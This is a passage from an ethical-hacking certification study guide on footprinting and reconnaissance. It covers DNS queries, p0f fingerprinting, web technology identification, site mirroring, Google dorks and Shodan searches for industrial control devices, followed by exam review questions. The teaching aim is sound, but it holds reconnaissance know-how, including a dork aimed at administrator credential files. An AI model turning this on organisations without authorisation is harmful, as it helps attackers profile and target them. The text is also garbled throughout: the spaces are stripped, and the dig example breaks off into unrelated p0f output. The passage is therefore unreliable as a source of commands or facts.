NameResolution$nslookup>settype=ns>sybex.comServer:192.168.86.1Address:192.168.86.1#53Non-­authoritativeanswer:sybex.comsybex.comsybex.comsybex.comsybex.comsybex.comnameservernameservernameservernameservernameservernameserver======jws-­edcp.wiley.com.ns.wiley.co.uk.ns2.wiley.co.uk.sg-­ns01.wiley.com.bri-­ns01.wiley.com.ns.wileypub.com.Authoritativeanswerscanbefoundfrom:>settype=A>serverns.wileypub.com.Defaultserver:ns.wileypub.com.Address:12.165.240.53#53>www.sybex.comDomainNameSystem Server:Address:129ns.wileypub.com.12.165.240.53#53Name:www.sybex.comAddress:208.215.179.132InsteadofjustlookinguptheIPaddressfromthehostname,Iusedresourcerecordstostart.DNSsupportsmultipleresourcerecords,thoughthemostcommonistheaddress(A)record.Whenyouseesettype=ns,I’mtellingnslookuptoissuesubsequentrequestsaskingfornameserver(NS)records.Thiswilltellustheauthoritativenameserversforthegivendomain.OnceIhadthelistofNSs,IwasabletosettheserverIwasaskingtooneoftheNSs.Whatthismeansisthatinsteadofgoingtomycachingserver,nslookupisgoingtoissueaDNSrequestdirectlytotheauthoritativeserver,whichwouldn’thavetodoanyrecursivesearchsinceithastheinformationbeingrequested.UsingdigTheprogramdigisanotherutilitythatcanbeusedfornameresolutions.Italsosupportsthesamethingswehavebeendoing,meaningwecanindicateadifferentnameserverandalsorequestdifferentresourcerecords.Anexampleusingdigcanbeseeninthefollowingcode.Thecommandlinehasalltheinformationfortherequest,includingtheresourcerecordtype,therequest,andalsotheserverdigshouldissuetherequestto.Usingdigfor [email protected];[email protected];;globaloptions:+cmd;;Gotanswer:;;-­>>HEADER8.43.72.22/443(syn)]-­||client=192.168.86.45/46112|os=Linux3.11andnewer|dist=0|params=none|raw_sig=4:64+0:0:1460:mss*20,7:mss,sok,ts,nop,ws:df,id+:0|`-­-­-­-­PassiveReconnaissance 137.-­[192.168.86.45/46112-­>8.43.72.22/443(mtu)]-­||client=192.168.86.45/46112|link=Ethernetormodem|raw_mtu=1500|`-­-­-­-­.-­[192.168.86.45/46112-­>8.43.72.22/443(uptime)]-­||client=192.168.86.45/46112|uptime=48days7hrs54min(modulo49days)|raw_freq=1000.00Hz|`-­-­-­-­.-­[192.168.86.45/33498-­>52.94.210.45/443(syn)]-­||client=192.168.86.45/33498|os=Linux3.11andnewer|dist=0|params=none|raw_sig=4:64+0:0:1460:mss*20,7:mss,sok,ts,nop,ws:df,id+:0|`-­-­-­-­.-­[192.168.86.45/33498-­>52.94.210.45/443(hostchange)]-­||client=192.168.86.45/33498|reason=tstampport|raw_hits=0,1,1,1|`-­-­-­-­Verylittleofwhatyouseehereisanythingyouwouldn’tbeabletodetermineyourselfifyouknewhowtoreadpacketheaders.ThepacketcaptureandanalysisprogramWiresharkcouldprovidemuchofthisinformation.Someoftheinterestingbits,though,includeidentifyingsystemuptime.Thisistheuptimeonsystemsonmylocalnetwork,soit’slessinteresting,perhaps,thanitwouldbeifwecouldsoeasilyidentifyuptimeonremotesystems.138 Chapter4  Footprintingand Reconnaissance■Youcanalsoseethatp0fisabletoidentifytheoperatingsystemtypeonsomesystems.Ithappenstobethesystemthatp0fisrunningon,butitmakesthedeterminationbasedonthenetworkheaderssinceoperatingsystemshavedifferent“signatures”thatarebasedonhowtheIPidentificationnumberisgenerated,howtheTCPsequencenumberisgenerated,howephemeralportnumbersareselected,andotherpiecesofinformationp0fcancollect.Whilewearetalkingaboutpassivereconnaissance,weshouldlookatsomeweb-­basedtoolsthatsuggesttheydopassivereconnaissance.OneofthemwasnamedPassiveRecon,thoughithasn’tbeenupdatedinyearsandmaynotbeavailable.Itcanbefoundasanadd­onforFirefox,butonlyforcertainversionsofFirefox.OneofthenicethingsaboutPassiveRecon,thoughI’mnotsureitcouldbeproperlycalledpassivereconnaissance,isthatitmadeDNS,whois,andrelatedtoolsavailableasacontextmenuselectiononanylink.Youcouldquicklygetinformationaboutthesiteyouhadselected.IfPassiveReconisn’tavailable,youcantakealookatsomeothertools.Oneofthem,thoughitdoesn’tbehavequitethesame,isR3con.ThisisapluginforFirefox.Whenyouactivateit,awindowthatlookslikewhatyouseeinFigure 4.15opens.Youwillhavemultipletabswitheditboxesonthem,expectinginputdependingonwhatyouwanttolookup.Thetabshownisthewhoistab,whichexpectsadomainnameoranIPaddress,justaswhenweusedwhoisearlier.FIGURE 4.15 ReconwithR3conYoumaynotbeusingFirefox,thoughwhatyou’llprobablyfindisthatthebrowserthathasthemajorityofpluginsthatareusefulforsecuritytestingisFirefox.IusedtojokethatFirefoxwasthebrowserthatwasinsecureenoughtoallowpluginsaccesstodoallsortsofbadthings.Thisisn’ttrue,ofcourse.PluginshavebeenaroundforFirefoxmuchlongerWebsiteIntelligence 139thanforotherbrowsers,sothedevelopmentcommunityhasbeenaroundforawhile.Otherbrowsers,likeChrome,canbemuchmorerestrictiveinwhattheywillallowdeveloperstodo,though,whichalsomakesFirefoxmoreattractive.OnepluginorextensionavailableinChromeisRecon.ThisismuchlikePassiveReconinthatitprovidesacontextmenuwhenyouright-­clickalinkinapage.TheReconmenugivesyouquickaccesstolookupinformationaboutthelinkorwordyouhaveselected.YoucandoGoogleorBingsearches,forexample,andReconwillopenanewtaborwindowwiththeresultsofasearchonwhatyouhaveselected.Youcanalsogettranslationsofwords,dopackagetracking,searchvideosites,andperformanumberofotherquicksearcheswhereyourselectionispassedintothesiteyouhaveselectedfromthemenu.Thesesortsoftoolscanbeinvaluabletoquicklysearchforanswers,thoughtheyaren’tpassivereconnaissanceinthesamesensethatwatchingnetworktrafficis.However,thisisnotatalltosaythattheinformationyoucangetfromthesetoolsisn’tvaluable.Anytoolthatcansaveyoutimeandmaybeevenexposeyoutoanewtechniqueyoucouldaddtoyourarsenalisveryvaluable.Evenwithallofthis,thereisstillinformationwecanlookatthatwehaven’tseenasyet.WebsiteIntelligenceItwouldbedifficulttofindacompanythathadnowebpresenceatall.It’spossible,ofcourse,thoughit’sunlikely.EvensmallcompaniesprobablyhaveapageonFacebooktoshowthehourstheyareopen.Companiesthatmaybemostpronetoneedtheservicesofanethicalhackertoperformtestingwilllikelyhaveawebsite.Itmayevenhaveprogrammaticelements.Anysitethathasprogrammaticelementshasthepotentialtobecompromised.Webapplicationsareacommonpointofattackforadversaries.Thisisalltosaythatgatheringintelligenceaboutawebsitecanendupbearingfruit.Startingfromthebottomofthestack,wecanlookatwhatthewebserverisaswellastheoperatingsystem.Onewaytogetsomeofthisinformationisjusttoconnecttothewebserverandissuearequesttoit.Inthefollowingcode,youcanseetheHTTPheadersreturnedfromarequesttoawebsite.Whilewedon’tgettheactualwebservername,wedogetsomeinterestinginformation.GatheringWebsiteIntelligenceHTTP/1.1301MovedPermanentlyServer:CloudFrontDate:Fri,06Jul201822:56:29GMTContent-­Type:text/htmlContent-­Length:183Connection:keep-­aliveLocation:https://www.wiley.com/140 Chapter4  Footprintingand Reconnaissance■X-­Cache:RedirectfromcloudfrontVia:1.13fed6f40ae58f485d8018b6d900fcc88.cloudfront.net(CloudFront)X-­Amz-­Cf-­Id:S_FZ4mwkJ9wY_aW24hHF3yCVvnGNNrFu6t52DGNJyc74o0iswv7Suw==Thereisactuallyaneasierwaytodothis.Thewebsitenetcraft.comwillgivehostinghistoryforwebsites.ThiswillprovidetheownerofthenetblockthatcontainstheIPaddress.Itwillalsotellyoutheoperatingsystemthewebserverrunson.Insomecases,youwillgetdetailsaboutthewebserverversionandothermodulesthathavebeenenabled.OneofthedomainsIhavehasbeenaroundforalongtime,andFigure 4.16showsthehostinghistoryforthatdomain.In2001,thesitewashostedonanOpenBSDsystem(NetcraftsaysNetBSD/OpenBSD,butsinceIwashostingitmyself,IknowitwasOpenBSD).YoucanalsoseethatitwasrunningonApacheatthattime.FIGURE 4.16 NetcrafthostinghistoryWhilethehistoryisinteresting,it’sfarmorerelevanttoknowwhatthetechnologyforthewebsiteisnow.Thetoplineisthemostrecent.Currently,thesiteishostedonIISwiththenetworkblockbeingownedbyMicrosoft.ThatsuggeststhatMicrosoftishostingthissite,andsinceit’sIIS,theoperatingsystemwouldbeWindowsServer.Whatwedon’tknowiswhatversionofWindowsServer.Thereasonthisinformationisusefulisthatwemaybeabletogetaleguponvulnerabilities.Ifwehavesomehintsaboutversions,wewouldhaveamuchbetterideawhatvulnerabilitiesexistonthesystemwherethewebsiteishosted.Thisonlygivesustheoperatingsystemandthewebserver.Thesedaysthereisfarmoretechnologybeingusedinwebsites.StaticpagesarewritteninHTML,butit’sfarmorelikelythatyou’llberunningupagainstadynamicsite.ThismeansyoumayfindasitewritteninWebsiteIntelligence 141thePHPorJavaprogramminglanguage.Thelanguageitselfisn’tenoughtoprovidethedeepfunctionalityneededbyarobustwebapplication.Instead,websiteprogrammersareapttouseframeworks.Theframeworkscanhavevulnerabilities,asexhibitedbytheExperiandatabreach,whichusedavulnerabilityintheSpringframeworkusedbyJava-­basedapplications.Backtothelandofwebbrowserpluginswego.OnethatisreallygoodisWappalyzer.WappalyzercanbeaddedtobothChromeandFirefox.Whenyouvisitawebsite,Wappalyzerwillprovidealistoftechnologiesitidentifies.Thismayincludethewebserver,programmingframeworks,adnetworks,andtrackingtechnology.It’snotalwayssuccessfulinidentifyingeverything.Goingtowww.google.comturnsuptheGooglewebserverandananalyticsframework.However,visitingCNNturnsupalotofdifferenttechnologies,someofwhichyoucanseeinFigure 4.17.Whatwedon’tgetthereisthewebserverbeingusedbyCNN.Wewilltakewhatweget,though,consideringalltheothertechnologiesinuseonthesite.FIGURE 4.17 WappalyzerfortechnologyThereareotherwaysyoucandigintowebpagesandthetechnologiesused.OneofthemisFirebug.It’savailableonFirefox,thoughthereisalsoFirebugLitethat’savailableinChrome.FirebugLitedoesn’thavequitethesamecapabilitiesasthefullFirebug.However,onChrome,Googlehasprovidedthedevelopertools.UsingeithertheChromedevelopertoolsorFirebug,youcanperformadeepinvestigationofthepageyouarelookingat.Tobeginwith,youcanlookatthedocumentobjectmodel(DOM)andallofitscomponents.YoucanalsoselectdifferentHTMLelementsinthepageandidentifystylesandproperties142 Chapter4  Footprintingand Reconnaissance■applicabletothatsection.Figure 4.18showsaportionoftheinformationthatyoucangetusingtheChromedevelopertools.ThepagebeinginspectedhereisaGooglesearchpage.Usingatoollikethis,youcangetabetterunderstandingofhowthepageoperatesbylookingatalltheelementsofthepageandhowtheyrelatetooneanother.FIGURE 4.18 ChromedevelopertoolsWebsitesarecomplexcreatures.TheChromedevelopertoolsandFirebugarecapableoflookingatonlyapageatatime.You’dhavetodigthrougheverypage,oneatatime,toinvestigatethemandtheircapabilities.Youmayfinditeasiertomirrorthewebsitesoyoucouldlookatitoffline.Withitstoredlocally,youcouldlookatthepagesasmanytimesasyouwouldlikewithoutneedingtoissuerepeatedrequeststotheremoteserver.Whiletherequestsaren’tlikelytoraiseanyeyebrowsandaren’tevenlikelytobenoticed,youareleavingtracksbehind.OnetoolyoucanusetomirrorthewebsiteisHTTrack.Inthefollowingcode,youcanseetheresultsofrunningHTTracktomirrorawebsite.Theprogramwillessentiallyperformaspiderontheremotesite,storingtheresultsinthedirectoryprovided.WebsiteIntelligence 143MirroringSiteswith httrack$httrackWelcometoHTTrackWebsiteCopier(OfflineBrowser)3.49-­2Copyright(C)1998-­2017XavierRocheandothercontributorsToseetheoptionlist,enterablanklineortryhttrack-­-­helpEnterprojectname:MySiteBasepath(return=/root/websites/):EnterURLs(separatedbycommasorblankspaces):http://www.domain.comAction:(enter)23450:11MirrorWebsite(s)MirrorWebsite(s)withWizardJustGetFilesIndicatedMirrorALLlinksinURLs(MultipleMirror)TestLinksInURLs(BookmarkTest)QuitProxy(return=none):Youcandefinewildcards,like:-­*.gif+www.*.com/*.zip-­*img_*.zipWildcards(return=none):Youcandefineadditionaloptions,suchasrecurselevel(-­r),separatedbyblankspacesToseetheoptionlist,typehelpAdditionaloptions(return=none):OnceyouhavetheHTML,youcandoanythingyouwantwithit.Youcanmakechanges,reviewallthescriptsthatareincludedinthepages,andreviewthepagesasyouneedto.Notalltechnologyisinthewebsite,though.Organizationshavealotofothertechnologythatcangenerallybeminedusingavarietyoftoolsandtechniques.144 Chapter4  Footprintingand Reconnaissance■TechnologyIntelligenceUltimately,yourgoalasanethicalhackeristoidentifyvulnerabilitieswithintheorganizationyouareworkingfor.Whilewebinterfacesareanattractiveplacetoplayandlookforvulnerabilities,consideringhowmuchsensitivedatacanbeavailablethroughwebinterfaces,it’snottheonlyplacetolookforvulnerabilities.However,youcanstillmakeuseofwebsitestocontinuetoexploretheboundsoftechnologywithinyourtargetcompany.Sofar,we’veidentifiedjobsitesandsomesocialnetworkingsitesinordertogainintelligenceabouttechnologyinuseatatarget.Beyondthat,wecanlookatacoupleofotherareas.ThefirstistohelpreallyfocusourwebsearchesusingGoogledorks,alsoknownasGooglehacking.Additionally,wecanlookfordevicesthatarepartoftheso-­calledInternetofThings(IoT).GoogleHackingGooglehackingisanimportantskilltohave.Itwillimprovethesearchresponses,savingyoualotoftimeclickingthroughpagesthataren’tespeciallyvaluable.Onceyouknowsomeofthekeywordsthatcanbeusedtoreallynarrowyoursearches,you’llsavetimeandbecomemoreefficient.TheGooglehackingtechniqueswillhelpyoutoidentifytechnologyandvulnerabilities.InadditiontoGooglehackingtechniques,thereistheGooglehackingdatabase,whichisacollectionofGoogledorksthathavebeenidentifiedbysomeoneasawaytosearchforanumberofthings.AdorkisastringusingGooglekeywords,designedtosearchforusefulresponses.First,theGooglekeywords.Ifyou’vebeenusingsearchenginesforalongtime,youmaybefamiliarwiththeuseofquotationmarksandBooleantermstohelpensurethatyouaregettingtherightstringsinyourresponses.Inadditiontothose,Googleusespositionalkeywords.Youmay,forinstance,wanttolookonlyintheURLforaparticularstring.TosearchintheURL,youwoulduseinurlasintheexample,inurl:index.ThisexamplewouldfindpagesthatincludedthewordindexanywhereintheURL.Thismighttypicallybeapagelikeindex.html,index.php,orindex.jsp.IfyouwantedtoignoretheURLandonlysearchinthetext,youcouldusethekeywordintext.Sinceyouareworkingforanorganization,youhaveonedomainormaybeasmallhandfulofdomains.Thismeansyouwill,atsomepoint,wanttosearchonlywithinthosedomains.Todothat,youcanusethesitekeyword.Youmayalsowanttolimityourresultstoasinglefiletype,suchasaportabledocumentformat(PDF)fileoraspreadsheet.Tolimityourresultstojustonefiletype,youwouldusethefiletypekeyword.PerhapsyouarelookingforallPDFdocumentsaboutWindows10onMicrosoft’ssite.Figure 4.19showsthesearchusedforthat(site:Microsoft.comfiletype:pdf“Windows10”)aswellasanumberofresults.AgreatplacetolookforexamplesofusefulGoogledorksistheGoogleHackingDatabase(https://www.exploit-­db.com/google-­hacking-­database/).TheGoogleHackingDatabase(GHDB)storessearchtermsinseveralcategories,includingfootholds,vulnerablefiles,errormessages,andsensitivedirectories.CreatingtheseusefulsearchstringsTechnologyIntelligence 145requiresthatyouknownotonlyabouttheGooglehackingkeywordsbutalsoaboutwhatyouarelookingfor.SomeexamplesareinFigure 4.20,wherethesearchstringsarelookingfornetworkorvulnerabilitydata.ThismeansthatsomeonewouldhavehadtoknowexactlywhatwouldbeinapageorURLthatwouldincludethisdata.Figure 4.20showssomeofthese.FIGURE 4.19 GooglehackingresultsSpendingtimeattheGHDBcanprovideyouwithalotofammunitionforlookingforpossibleissueswithinyourtarget.Someofthiswillbeblind,ifyouhavenoideawhattoexpectwithinyourtarget.Tomakesureyouareonlysearchingwithinyourtarget,ofcourse,youwouldneedtoaddsite:andthedomainnametoyoursearchparameters.OnethingyoumayhavenoticedfromtheMicrosoftsearchinFigure 4.20isthatwhenonlythedomainwasused,everypossiblehostnamecameback.Ifyouwanttosearchonlywithinasinglehostname,suchaswww.microsoft.com,youwouldprovidethehostname.OnlyprovidingthedomainwillbeanotherwaytocatchadditionalhostnamesthatyoumaynothavebeenabletogetusingDNSsearching.146 Chapter4  Footprintingand Reconnaissance■FIGURE 4.20 GoogleHackingDatabaseInternetofThings(IoT)YouwilllikelyhaveheardabouttheIoT.TheIoTismadeupofdevicesthatmayhavelittletonoinputoroutputcapabilities,atleastfromatraditionalstandpoint.Ifadevicecanrungeneralapplicationsandalsohasakeyboardandascreen,suchasacomputer,tablet,orsmartphone,it’snotpartoftheIoT.Manyotherdevices,likenetwork-­connectedthermostats,lightbulbs,fans,refrigerators,andanumberofotheressentiallysingle-­purposedevices,areIoTdevices.Manycompaniesaremakinguseofthisindifferentautomationcapacities.Thesedevicescanbeusefulwhenitcomestoinfiltratingasystem.MalwarelikeSatoricaninfectmultipleIoTdevices,andonceinfected,thosedevicescanbeusedtoattackothersystems.Theymayalsobegoodstartingpointsintotheenterprisenetwork,dependingonthedevice.Thisisanotherareawheresearchengines,though,canbehelpfultous.Shodan(www.shodan.io)isasearchenginespecificallyforIoTdevices.Shodankeepstrackofalargenumberofdevicesalongwithvendors,devicetypes,andcapabilities.Shodanalsorequiresunderstandingyourtargetandwhatcanbeusedtoidentifythesedevices.Figure 4.21showsanexample.Thesearchtermisport:20000sourceaddress,whichidentifiesDistributedNetworkProtocol(DNP)3devices.Thisisanotherareawherethesitecanbealotofhelp.ThesearchforDNP3devicescameasaresultofclickingalinkforIndustrialControlSystems(ICSs)andlookingatdifferentprotocolsthatShodanknowsabout.ShodanalsoassociateswithICStheFactoryInterfaceNetworkService(FINS),HighwayAddressableRemoteTransducerProtocol,andmanyothers.Therearealsosearchesfordifferentvendors.OnethingyoumaynoticeinthestatisticsisthefactthattheUnitedStatesisontopofallcountrieswiththesedevices.Shodanalsoidentifiesorganizationswherethedevicesarelocated.Clickingindividualresultsprovidesmoredetails,includingwherethedeviceislocated.Figure 4.22showssomeofthoseresults,thoughitdoesn’tshowthemapthatShodanprovides,presumablyindicatingexactlywherethedeviceislocated.TechnologyIntelligence 147FIGURE 4.21 ShodansearchforDNP3FIGURE 4.22 ShodanresultsShodanisanexcellentresourcewhenitcomestoidentifyingdevicesthatareconsideredpartoftheIoT.UsingsearchesoftheShodandatabase,youcanidentifydevicesthatmayexistonthetargetnetwork.148 Chapter4  Footprintingand Reconnaissance■SummaryFootprintingandreconnaissanceareimportantactivitiesinanoverallmethodologywhenitcomestoethicalhacking.Thisisthestagewhereyoucollectalotofdatathatyouwilluselater.It’salsoastagewhereyoudon’twanttomakealotofnoise.You’resneakinguponsomeonetoscarethem.Ifyoumakenoise,yougetnostartledreactionfromyourtarget.Thesameistruehere.Youwanttodoyourworkaheadoftimesowhenyougetstarted,youaren’tregisteringalotofactivitythatcouldgetyoudetectedandthenextthingyouknow,you’vebeenlockedout.Ifyouareinterestedtoseetechniques,tactics,andproceduresweknowreal-­lifeattackersused,youcanrefertotheMITREATT&CKFrameworkandgetsomeideasofhowthoseattackersmayoperate.Thiscanhelpyouensureyouareprovidingafullsetoftestingtotheorganizationyouareworkingwith.Therearemultiplesourcesofintelligencethatarefreelyandopenlyavailable.UsingsourcesliketheSEC’sEDGARdatabase,youcanobtaininformationaboutcompanies.Jobsitescanalsoprovideyouwithdetailsaboutacompanythatmaybeusefullater.Thisincludesthetechnologytheymaybeusing,sincewhentheyhirepeople,theygenerallyprovidejobrequirements,includingtechnologyvendorslikeMicrosoft,RedHat,Cisco,andPaloAltoNetworks.Youcanalsoreadreviewsfromemployeesthatmayhaveusefuldata.Socialnetworksitescanbeusedtogatherinformationaboutpeople,aswellascompanies.Thepeoplesometimespostinformationabouttheirjobsorthecompanyingeneral.Socialengineeringisacommonattacktechnique,andthisattacktechniquecanbemoresuccessfulifyouknowhowtotargetindividuals.Youcanalsogatherinformationaboutthecompaniesthemselves.Often,companieswillhaveasocialnetworkpresence.Additionally,therearesiteslikeLinkedInthatarefocusedonbusinessesandbusinessinteractions.TheInternetrequiresdatatofunction.Thisincludeswhohasbeenallocatedaddresses.TheseallocationsgothroughRIRs.YoucanusetoolslikewhoistogathersomeofthisdatafromtheRIRs.Theprogramwhoiscanalsobeusedtogatherregistrationdetailsaboutdomains.Thiswouldincludeaddresses,phonenumbers,andcontactinformation.Notalldomainswillhavethisinformationsinceregistrarswillsometimeshidethedetailsoftheregistrant.Whatyou’llgetistheregistrar’scontactinformationandaddressandnottheorganization.WhatyouwillalsogetoutofthisistheregisteredNSsforthedomain.ThesearetheNSsconsideredtobeauthoritativeforthedomain.DNScontainsalotofdetailaboutacompanyifyoucanfindit.Thequickestwaytoget allofthehostsistodoazonetransfer,butitwouldbeunlikelyforzonetransferstobeallowed.Instead,youmayhavetoresorttosomethinglikebrute-­forcingDNSrequeststoguesspossiblehostnames.Fromthis,youwillgethostnamesthatcanbecometargets.YouwillalsogetIPaddresses.TheseIPaddressescanberunthroughwhoistogetthenetworkblockandtheowneroftheblock.YoumaygetrangesofIPaddressesthatbelongtothecompanyfromdoingthat.It’sacommontacticforcompaniestohavebothinternalandexternalDNSservers.Thishelpsprotectthecompanybynotexposinginternalsystemstotheoutsideworld.OnceyouSummary 149haveaccesstotheinsideofthenetworkbycompromisingsomesystem,youcanlookattheDNScache.ThisisdoneonWindowssystemsbyrunningipconfig/displaydns.ThiswillshowallofthecachedDNSentries,meaninghostname/IPmappingsthatwereresolvedatsomepointandarebeingstoredtohelpspeeduptheresolutionthenexttimeanapplicationneedstheIPaddress.Acachedentrywillmeananetworkrequestdoesn’thavetobemade,whichcansavetime.Manyattackstakeplacethroughwebinterfaces.Whilegatheringdetailsaboutawebserverorthetechnologiesusedinawebsiteisn’tentirelypassive,meaningusingthird-­partysources,makingcommonrequeststoawebservershouldn’tbenoticedmuch.Aslongasyouaren’tsendingtoomanyrequestsallatonceorsendingsomethingunusual,you’llgetlostinthenoiseofalltheotherregularrequests.Googlehackingisatechniqueyoucanusetonarrowyoursearchandgetresultsthatarefocusedandrelevant.Googlehackingisatechniquethatmakesuseofkeywordslikesite,inurl,intext,filetype,andlinktogetveryspecificresults.Oneofthemostusefulwillbethesitekeyword,whichmeansyouaresearchingwithinonlyonedomain.Thismeansyouareonlylookingatresultswithintheorganizationyouaretestingfor.Ifyouneedhelpidentifyingsearchtermsthatmayhelpyouidentifyvulnerabilities,youcanusetheGoogleHackingDatabase.Peopleandbusinessesareoftenusingdevicesthathaveanetworkconnectionbutdon’thavetraditionalmeansforuserstointeractwiththem.Thisoftenmeansthesedevicescanbevulnerabletoattack.AllthesedevicesarecalledtheInternetofThings(IoT).TherearesiteslikeShodanthatcanbeusedtoidentifytheseembeddeddevices.Shodanwillprovidealotofdetailsaboutadevice,includingtheIPaddressandwheretheIPaddressislocated.YoushouldbeabletonarrowdownwhetherthedevicebelongstoyourtargetcompanyusingasitelikeShodan.150 Chapter4  Footprintingand Reconnaissance■ReviewQuestionsYoucanfindtheanswersintheappendix.1.IfyouwerecheckingontheIPaddressesforacompanyinFrance,whatRIRwouldyoubecheckingwithfordetails?A.ARINB.RIPEC.AfriNICD.LACNIC2.YouneedtoidentifyallExcelspreadsheetsavailablefromthecompanyExample,Inc.,whosedomainisexample.com.Whatsearchquerywouldyouuse?A.site:example.comfiles:pdfB.site:excelfiles:xlsC.domain:example.comfiletype:xlsD.site:example.comfiletype:xls3.Ifyoufoundacolleaguesearchingatpgp.mit.edu,whatwouldtheylikelybelookingfor?A.EmailaddressesB.CompanykeysC.ExecutivenamesD.Privacypolicies4.Whatinformationcouldyougetfromrunningp0f?A.LocaltimeB.RemotetimeC.AbsolutetimeD.Uptime5.TheDNSserverwhererecordsforadomainbelongingtoanorganizationorenterpriseresideiscalledthe____________server.A.CachingB.RecursiveC.AuthoritativeD.Local6.Whatstrategydoesalocal,cachingDNSserverusetolookuprecordswhenasked?A.RecursiveB.SerialC.CombinatoricsD.BistromathicsReviewQuestions 1517.Whatwouldyouuseajoblistingforwhenperformingreconnaissance?A.ExecutivestaffB.TechnologiesusedC.PhishingtargetsD.Financialrecords8.WhattoolcouldbeusedtogatheremailaddressesfromPGPservers,Bing,Google,orLinkedIn?A.whoisB.digC.netstatD.theHarvester9.Whatsocialnetworkingsitewouldbemostlikelytobeusefulingatheringinformationaboutacompany,includingjobtitles?A.TwitterB.LinkedInC.FoursquareD.Facebook10.Youseethefollowingtextwrittendown—­port:502.Whatdoesthatlikelyreference?A.ShodansearchB.I/OsearchC.p0fresultsD.RIRquery11.WhatwouldyouuseWappalyzerfor?A.AnalyzingwebheadersB.AnalyzingapplicationcodeC.IdentifyingwebheadersD.Identifyingwebtechnologies12.Whattechniquewouldyouideallyusetoget allthehostnamesassociatedwithadomain?A.DNSqueryB.ZonecopyC.ZonetransferD.Recursiverequest13.WhatinformationwouldyounotexpecttofindintheresponsetoawhoisqueryaboutanIPaddress?A.IPaddressblockB.Domainassociation152 Chapter4  Footprintingand Reconnaissance■C.AddressblockownerD.Technicalcontact14.Whatwouldyoubelookingforwiththefiletype:txtAdministrator:500:Googlequery?A.TextfilesownedbytheadministratorB.AdministratorloginfromfileC.TextfilesincludingthetextAdministrator:500:D.500administratorfileswithtext15.Whatcommandwouldyouusetogetthelistofmailserversforadomain?A.whoismxzone=domain.comB.netstatzone=domain.commxC.digdomain.com@mxD.digmxdomain.com16.Whatwouldyougetfromrunningthecommanddignsdomain.com?A.Mailexchangerrecordsfordomain.comB.Nameserverrecordsfordomain.comC.Cachingnameserverfordomain.comD.IPaddressforthehostnamens17.Ifyouwantedtolocatedetailedinformationaboutapersonusingeithertheirnameorausernameyouhave,whichwebsitewouldyouuse?A.peekyou.comB.twitter.comC.intelius.comD.facebook.com18.Ifyouwerelookingfordetailedfinancialinformationonatargetcompany,withwhatresourcewouldyouhavethemostsuccess?A.LinkedInB.FacebookC.EDGARD.MORTIMER19.Whatfinancialfilingisrequiredforpubliccompaniesandwouldprovideyouwiththeannualreport?A.10-­QB.11-­KC.401(k)D.14-­AReviewQuestions 20.IfyouwerelookingupinformationaboutacompanyinNewZealand,whichRIRwouldyoubelookinginfordata?A.AfriNICB.RIPEC.APNICD.LACNIC153Chapter5ScanningNetworksTHEFOLLOWINGCEHEXAMTOPICSARECOVEREDINTHISCHAPTER:✓✓Communicationonprotocols✓✓Technicalassessmentmethods✓✓Vulnerabilities✓✓Vulnerabilityscanners✓✓Networksecurity✓✓Portscanning✓✓SecuritytestingmethodologyWithallthereconnaissanceandinformationgatheringbehindus,wecanstartmovingintointeractingwiththesystemsinthetargetanditsnetworks.Thisstagerequiresthedatagatheredfromthereconnaissanceandfootprintingsteps.Withoutthat,youwillhavenoideawhattoscan.Ofcourse,ifyouareworkinghandinglove,asitwere,withthecustomer,theymayhaveprovidedyouwithalotofthedetailsyouwouldnormallyhavegottenwithreconnaissancetechniques.Eitherwayisokay,aslongasyouareclearupfrontaboutwhatthescopeandscaleoftheengagementisand,onceyoustartdirectlyinteractingwithsystems,youdon’tmovebeyondwhatwasagreedtowithyourtarget.EthicsNoteJustareminder,especiallyaswestartmovingintotouchingsystems,youmustgetpermission.Eventhoughwe’rejusttalkingaboutscanningandnotperformingexploits,it’sentirelypossibleforascantoknockoverasystem.Onreallyfragilesystems,suchasolderembeddeddevices,asimpleportscancancausethedevicetofail.Ensurethatyouhavepermissionfromyourtarget/clientandthattheyhaveanunderstandingofwhatmayhappenonceyougetstarted.Expecttheunexpectedandinformyourclient/employer.Acommonsteptomovetowhenfirstinteractingwithtargetsystemsistoperformaportscan.Aportscanidentifiesopenportsonsystemsconnectedtothetargetnetwork.Aportscanisn’tdonejustforthepurposeofdoingaportscan.Aportscanisastartingpointforidentifyingservicesandapplicationsthatarelisteningonthoseports.Keepinmindthattheobjectiveisalwaystoidentifyissuesonyourtargetnetworksoyourclient/employercanimprovetheirsecurityposture.Identifyingapplicationscanhelpusidentifyvulnerabilitiesthatneedtobeaddressed.Justidentifyingservicesandapplicationsmaynotprovideyouwithalotofinformation,andwhatinformationitdoesprovidecancreatealotofworkforyou.Knowingtheapplicationnameandeventheversionmeansyouneedtostartdiggingintopotentialvulnerabilitiesthatmayexistwiththatapplicationandservice.Thisiswhyweusevulnerabilityscanners.Thevulnerabilityscannercanhelpsavetimeduringthatprocess.Youshouldn’tassume,though,thatthevulnerabilityscannerisinfallible.Vulnerabilityscannerscanmakemistakes—­onbothendsofthespectrum,meaningitcanmissvulnerabilitiesaswellasreportonesthatreallydon’texist.Theknowledgeandskillofanethicalhackerisimportanthere—­knowinghowtoverifyandknowingwhatisrealandwhatisn’t.PingSweeps 157Firewallscanbearealnuisance,ascanintrusiondetection(orprotection)systemsforthatmatter,ifyouaredoingatruered-­teamtestwheretheoperationsteamdoesn’tknowwhatyouaredoingandyoudon’twantthemtoknow.Thismeansthatthesetechnologiescaninhibitordeterattemptstoreachintothenetworktogatherinformationthatyoucanuselater.Portsmaybeopenonsystemsbutclosedinthefirewall.Thislimitsyourabilitytogettothoseapplications.Yourscanattemptsmaybedetected,alertingsecurityandoperationsstaffaboutwhatyouaredoing,whichmaymeanyoujustgetbarredaltogether.Dependingontherulesoftheengagement,youmaynotwanttobedetected.Thismeanstheremaybeevasiontechniquesthatneedtobeemployedtomakesureyoucankeepgoinganddon’tgetblocked.Onewaytoachievethat,andalsotopokeatsomefunctionalitytoidentifypossiblevulnerabilities,istousepacketcrafting.Packetcraftingmeansyoubypasstheoperatingsystemanditsmechanismsforcreatingallthedatastructuresintherightwayfortransmissionoverthenetwork.Thereasonfordoingthisistocreatethosemessagesincorrectly.Iftheydon’tlookright,theymaygetignoredbyfirewallsordetectionsystems.Thismayallowthemessagetogettotheendpoint.MITREidentifiesactivescanningasatechniqueattackersuseandreferstotwosubtechniques,scanningIPblocksandvulnerabilityscanning.WhileMITREiscorrect,thedescriptionmissesalotofdetail.Asyouwillseeintherestofthischapter,scanningIPblocksandvulnerabilityscanninghavealotofdifferenttoolsandtactics.PingSweepsRatherthanblindlythrowingattacksataddressspacesyou’veidentified,youmaywanttoidentifysystemsthatareresponsivewithinthoseaddressspaces.Responsivemeansthatwhennetworkmessagesarese